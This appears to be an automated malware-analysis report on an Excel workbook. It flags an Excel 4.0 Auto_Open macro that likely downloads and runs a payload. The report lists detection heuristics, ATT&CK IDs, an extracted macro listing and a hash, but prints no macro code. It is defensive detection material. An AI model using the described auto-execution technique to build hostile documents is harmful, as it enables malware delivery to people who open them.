MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open macro, which is a known technique for executing malicious code upon opening the workbook. The heuristics indicate the use of dangerous formula APIs like RUN, suggesting the macro is designed to download and execute a secondary payload. The obfuscated nature of the macro formulas prevents a more precise identification of the payload or its destination.
Heuristics 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 125193 bytes |

SHA-256: 7c8bf6a76e0e589b220da55e9bca58c71a4914bf2dc0b034020525de2d6f6349

Preview script: first 1,000 lines of the extracted script